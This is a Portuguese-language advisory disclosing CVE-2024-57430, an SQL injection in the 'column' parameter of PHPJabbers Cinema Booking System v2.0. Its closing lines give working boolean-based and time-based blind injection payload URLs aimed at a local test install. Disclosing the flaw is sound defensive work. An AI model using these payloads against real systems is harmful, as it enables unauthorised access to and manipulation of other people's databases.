
CVE-2024-57430: PHPJabbers Cinema Booking System v2.0 é vulnerável a injeção SQL, levando a acesso não autorizado a dados e escalonamento de privilégio.
Uma vulnerabilidade de injeção SQL na função pjActionGetUser do PHPJabbers Cinema Booking System v2.0 permite que atacantes manipulem consultas ao banco de dados através do parâmetro column. Explorar esta falha pode levar à divulgação não autorizada de informações, escalonamento de privilégios ou manipulação do banco de dados.
Parâmetro Vulnerável: column
A injeção SQL pode levar ao acesso não autorizado a informações sensíveis, modificação do banco de dados e até mesmo ao comprometimento total do servidor de banco de dados. Isso representa uma ameaça crítica à confidencialidade, integridade e disponibilidade da aplicação.
Requisição GET na URL: http://127.0.0.1/CinemaBookingDev/index.php?controller=pjAdminUsers&action=pjActionGetUser&column=*&&direction=ASC&page=1&rowCount=10
Parameter: #1* (URI)
Type: boolean-based blind
Title: MySQL RLIKE boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause
Payload: http://127.0.0.1/CinemaBookingDev/index.php?controller=pjAdminUsers&action=pjActionGetUser&column=name RLIKE (SELECT (CASE WHEN (7874=7874) THEN 0x6e616d65 ELSE 0x28 END))&direction=ASC&page=1&rowCount=10
Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: http://127.0.0.1/CinemaBookingDev/index.php?controller=pjAdminUsers&action=pjActionGetUser&column=name AND (SELECT 6530 FROM (SELECT(SLEEP(5)))UFOj)&direction=ASC&page=1&rowCount=10